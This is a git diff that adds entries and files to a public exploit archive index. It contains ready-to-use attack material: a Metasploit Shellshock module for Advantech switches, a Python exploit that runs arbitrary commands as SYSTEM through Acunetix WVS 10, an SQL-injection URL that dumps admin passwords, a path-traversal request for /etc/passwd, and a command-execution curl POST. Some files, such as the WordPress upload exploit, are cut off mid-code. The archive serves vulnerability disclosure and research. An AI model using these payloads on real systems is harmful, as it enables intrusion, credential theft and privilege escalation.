diff --git a/files.csv b/files.csv
index 77efef352..652ed1493 100755
--- a/files.csv
+++ b/files.csv
@@ -35103,5 +35103,14 @@ id,file,description,date,author,platform,type,port
38833,platforms/linux/webapps/38833.txt,"Kodi 15 - Arbitrary File Aaccess (Web Interface)",2015-12-01,"Machiel Pronk",linux,webapps,0
38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80
38841,platforms/php/webapps/38841.txt,"Zenphoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80
+38842,platforms/php/webapps/38842.txt,"Testa OTMS Multiple SQL Injection Vulnerabilities",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0
+38843,platforms/php/webapps/38843.txt,"TomatoCart 'install/rpc.php' Local File Include Vulnerability",2013-11-18,Esac,php,webapps,0
38835,platforms/multiple/local/38835.py,"Centos 7.1/Fedora 22 - abrt Local Root",2015-12-01,rebel,multiple,local,0
38836,platforms/multiple/webapps/38836.txt,"ntop-ng <= 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0
+38844,platforms/php/webapps/38844.html,"WordPress Blue Wrench Video Widget Plugin Cross Site Request Forgery Vulnerability",2013-11-23,"Haider Mahmood",php,webapps,0
+38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0
+38846,platforms/multiple/remote/38846.txt,"nginx <= 1.1.17 URI Processing Security Bypass Vulnerability",2013-11-19,"Ivan Fratric",multiple,remote,0
+38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0
+38848,platforms/php/webapps/38848.php,"WordPress Suco Themes 'themify-ajax.php' Arbitrary File Upload Vulnerability",2013-11-20,DevilScreaM,php,webapps,0
+38849,platforms/cgi/remote/38849.rb,"Advantech Switch Bash Environment Variable Code Injection (Shellshock)",2015-12-02,metasploit,cgi,remote,0
+38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics Remote Code Injection Vulnerability",2013-11-22,"Eduardo Gonzalez",hardware,remote,0
diff --git a/platforms/cgi/remote/38849.rb b/platforms/cgi/remote/38849.rb
new file mode 100755
index 000000000..509d5479a
--- /dev/null
+++ b/platforms/cgi/remote/38849.rb
@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',
+ 'Description' => %q{
+ This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
+ handles external environment variables. This module targets the 'ping.sh' CGI
+ script, acessible through the Boa web server on Advantech switches. This module
+ was tested against firmware version 1322_D1.98.
+ },
+ 'Author' => 'hdm',
+ 'References' => [
+ ['CVE', '2014-6271'],
+ ['CWE', '94'],
+ ['OSVDB', '112004'],
+ ['EDB', '34765'],
+ ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'],
+ ['URL', 'https://access.redhat.com/articles/1200223'],
+ ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
+ ],
+ 'Privileged' => false,
+ 'Arch' => ARCH_CMD,
+ 'Platform' => 'unix',
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00\x0A\x0D",
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'openssl generic'
+ }
+ },
+ 'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],
+ 'DefaultTarget' => 0,
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => 'Dec 01 2015'
+ ))
+ register_options([
+ Opt::RPORT(80)
+ ], self.class)
+ end
+
+ #
+ # CVE-2014-6271
+ #
+ def cve_2014_6271(cmd)
+ %{() { :;}; $(#{cmd}) & }
+ end
+
+ #
+ # Check credentials
+ #
+ def check
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => '/cgi-bin/ping.sh'
+ )
+ if !res
+ vprint_error("#{peer} - No response from host")
+ return Exploit::CheckCode::Unknown
+ elsif res.headers['Server'] =~ /Boa\/(.*)/
+ vprint_status("#{peer} - Found Boa version #{$1}")
+ else
+ print_status("#{peer} - Target is not a Boa web server")
+ return Exploit::CheckCode::Safe
+ end
+
+ if res.body.to_s.index('127.0.0.1 ping statistics')
+ return Exploit::CheckCode::Detected
+ else
+ vprint_error("#{peer} - Target does not appear to be an Advantech switch")
+ return Expoit::CheckCode::Safe
+ end
+ end
+
+ #
+ # Exploit
+ #
+ def exploit
+ cmd = cve_2014_6271(payload.encoded)
+ vprint_status("#{peer} - Trying to run command '#{cmd}'")
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => '/cgi-bin/ping.sh',
+ 'agent' => cmd
+ )
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/hardware/remote/38850.txt b/platforms/hardware/remote/38850.txt
new file mode 100755
index 000000000..ced8bc6ba
--- /dev/null
+++ b/platforms/hardware/remote/38850.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/63880/info
+
+Thomson Reuters Velocity Analytics is prone to a vulnerability that lets attackers inject and execute arbitrary code.
+
+Successfully exploiting this issue may allow an attacker to upload and execute arbitrary code with SYSTEM privileges.
+
+Thomson Reuters Velocity Analytics 6.94 build 2995 is vulnerable; other versions may also be affected.
+
+http://www.example.com/VhttpdMgr?action=importFile&fileName={BACKDOOR}
\ No newline at end of file
diff --git a/platforms/multiple/remote/38845.txt b/platforms/multiple/remote/38845.txt
new file mode 100755
index 000000000..4fe915db2
--- /dev/null
+++ b/platforms/multiple/remote/38845.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/63805/info
+
+SKIDATA Freemotion.Gate is prone to multiple remote command-execution vulnerabilities.
+
+Attackers can exploit these issues to execute arbitrary commands in the context of the affected system.
+
+SKIDATA Freemotion.Gate 4.1.3.5 is vulnerable; other versions may also be affected.
+
+curl -X POST --header "Content-Type:text/xml" --data-binary @manual-release.raw http://www.example.com:7777/skidata/hessian/CP > /dev/null 2>&1
\ No newline at end of file
diff --git a/platforms/multiple/remote/38846.txt b/platforms/multiple/remote/38846.txt
new file mode 100755
index 000000000..16a441b9f
--- /dev/null
+++ b/platforms/multiple/remote/38846.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/63814/info
+
+nginx is prone to a remote security-bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
+
+nginx 0.8.41 through 1.5.6 are vulnerable.
+
+The following example data is available:
+
+/file \0.php
\ No newline at end of file
diff --git a/platforms/php/webapps/38842.txt b/platforms/php/webapps/38842.txt
new file mode 100755
index 000000000..76998f559
--- /dev/null
+++ b/platforms/php/webapps/38842.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/63773/info
+
+Testa OTMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+Testa OTMS 2.0.0.2 is vulnerable; other version may also be vulnerable.
+
+http://www.example.com /?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
+http://www.example.com/test/admin/index.php
\ No newline at end of file
diff --git a/platforms/php/webapps/38843.txt b/platforms/php/webapps/38843.txt
new file mode 100755
index 000000000..c1fee4a23
--- /dev/null
+++ b/platforms/php/webapps/38843.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/63795/info
+
+TomatoCart is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+TomatoCart 1.1.8.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com//install/rpc.php?action=dbCheck&class=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg
\ No newline at end of file
diff --git a/platforms/php/webapps/38844.html b/platforms/php/webapps/38844.html
new file mode 100755
index 000000000..cbe34cf32
--- /dev/null
+++ b/platforms/php/webapps/38844.html
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/63800/info
+
+The Blue Wrench Video Widget plugin for WordPress is prone to a cross-site request-forgery vulnerability.
+
+An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
+
+Blue Wrench Video Widget 1.0.2 is vulnerable; other versions may also be affected.
+
+
diff --git a/platforms/php/webapps/38848.php b/platforms/php/webapps/38848.php
new file mode 100755
index 000000000..5a45bbc3b
--- /dev/null
+++ b/platforms/php/webapps/38848.php
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/63836/info
+
+The Suco themes for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+?>
diff --git a/platforms/windows/local/38847.py b/platforms/windows/local/38847.py
new file mode 100755
index 000000000..9410dd2e4
--- /dev/null
+++ b/platforms/windows/local/38847.py
@@ -0,0 +1,162 @@
+'''
+========================================================================
+Acunetix WVS 10 - from guest to Sytem (Local privilege escalation)
+
+CVE: CVE-2015-4027
+Author: (me) Daniele Linguaglossa
+Affected Product: Acunetix WVS 10
+Exploit: Local privilege escalation
+Vendor: Acunetix ltd
+Remote: No
+Version: 10
+=========================================================================
+A local privilege escalation exists in Acunetix WVS 10, it allow
+a local user (even guest) to gain same privilege as System user.
+
+With default Acunetix installation, a service called "AcuWVSSchedulerv10"
+will be installed, this service run as local system user.
+
+AcuWVSSchedulerv10 is reponsable for scan scheduling without user interaction
+it expose some API to interact via a web server usually localhost:8183.
+
+API:
+
+/listScan
+/addScan <== vulnerable one
+/deleteScan
+etc...
+
+When a user schedule a scan API "addScan" will be called as following
+
+-------------------------------------------------------------------------------
+POST /api/addScan HTTP/1.1
+Host: localhost:8183
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/json; charset=UTF-8
+RequestValidated: true
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost:8183/
+Content-Length: 452
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+{
+ "scanType": "scan",
+ "targetList": "",
+ "target": ["http://.target.it"],
+ "recurse": "-1",
+ "date": "12/2/2015",
+ "dayOfWeek": "1",
+ "dayOfMonth": "1",
+ "time": "12:21",
+ "deleteAfterCompletion": "False",
+ "params": {
+ "profile": "Default",
+ "loginSeq": "",
+ "settings": "Default",
+ "scanningmode": "heuristic",
+ "excludedhours": "",
+ "savetodatabase": "True",
+ "savelogs": "False",
+ "generatereport": "False",
+ "reportformat": "PDF",
+ "reporttemplate": "WVSAffectedItemsReport.rep",
+ "emailaddress": ""
+ }
+}
+------------------------------------------------------------------------------
+
+The first thing i noticed was the reporttemplate, this was used to create report
+when scanning ends, so it means an external file wich we can control will be then
+used by System! this would be interesting enough but i never look deep into.
+Instead i noticed something even worst, filename was used as argument to wvs.exe
+called with system privilege!
+
+By looking at how Acunetix handled reporttemplate argument i figured out that was
+possibile to inject custom arguments within reporttemplate, now this is where
+Acunetix help us :D in fact wvs was provided with an interesting argument it was
+/Run as reference says:
+
+https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/
+
+Run a command line command during the crawl.
+Syntax: /Run [command]
+
+Example: /Run curl http://example.com/dir1/
+
+Wow that's really nice, so in order to execute a command we must insert a fake
+Crawl followed by a Run command so reporttemplate become:
+
+"reporttemplate": "WVSAffectedItemsReport.rep /Craw http://fakesite.it /Run cmd.exe"
+
+it worked cmd runned as System!
+==================================================================================
+
+Now let's pwn this!
+
+escalation.py
+'''
+
+import httplib
+import json
+from datetime import datetime
+import sys
+from time import gmtime, strftime
+
+
+COMMAND = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe"
+ACUHOST = '127.0.0.1'
+ACUPORT = 8183
+ACUHEADERS = {
+ "Content-Type": "application/json; charset=UTF-8",
+ "X-Requested-With": "XMLHttpRequest",
+ "Accept": "application/json, text/javascript, */*; q=0.01",
+ "RequestValidated": "true"
+ }
+ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\""
+ACUDATA = {"scanType":"scan",
+ "targetList":"",
+ "target":["http://"+"A"*2048],
+ "recurse":"-1",
+ "date":strftime("%m/%d/%Y", gmtime()),
+ "dayOfWeek":"1",
+ "dayOfMonth":"1",
+ "time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1),
+ "deleteAfterCompletion":"False",
+ "params":{"profile":"Default",
+ "loginSeq":"",
+ "settings":"Default",
+ "scanningmode":"heuristic",
+ "excludedhours":"",
+ "savetodatabase":"True",
+ "savelogs":"False",
+ "generatereport":"False",
+ "reportformat":"PDF",
+ "reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT,
+ "emailaddress":""}
+ }
+
+def sendExploit():
+ conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
+ conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
+ resp = conn.getresponse()
+ return "%s %s" % (resp.status, resp.reason)
+
+print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n"
+print "[+] Command : %s will be executed as SYSTEM" % COMMAND
+print "[+] Sending exploit..."
+print "[+] Result: "+sendExploit()
+print "[+] Done!"
+
+'''
+============================================================================
+
+I hope this write-up was funny enough anyway i really would like to thank
+Acunetix product manager N.S. for the really fast answer and bug mitigation,
+right now a patch exists so hurry up download it now.
+============================================================================
+'''
\ No newline at end of file